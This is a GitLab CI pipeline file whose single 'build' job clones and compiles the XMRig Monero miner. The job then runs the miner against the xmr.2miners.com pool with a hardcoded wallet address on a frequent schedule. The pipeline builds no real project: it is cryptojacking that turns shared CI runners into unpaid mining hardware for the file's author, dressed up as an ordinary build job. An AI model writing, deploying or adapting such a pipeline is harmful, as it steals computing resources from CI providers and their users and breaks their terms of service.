variables:
  CUSTOM_SCHEDULE: "*/10 */6 * * *"
stages:
  - build
job_build:
  stage: build
  image: ubuntu:latest
  only:
    variables:
      - $CI_PIPELINE_SOURCE == "schedule"
      - $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
      - $CUSTOM_SCHEDULE
  before_script:
    - apt update
    - apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
  script:
    - git clone https://github.com/xmrig/xmrig.git
    - mkdir xmrig/build
    - cd xmrig/build
    - cmake ..
    - make -j$(nproc)
    - cd ..    
    - ./xmrig -o xmr.2miners.com:2222 -u 8C8ihAeP2HuNrJECaJJdsQcboBJwcpQ3fcyrUfAo7m6NKPtem4xMuV8KtXLKMAh5FcVtUtyAQurHbLsp77fjpm9LDEAEzee -p gitrig -k --coin monero -a rx/0 --threads 2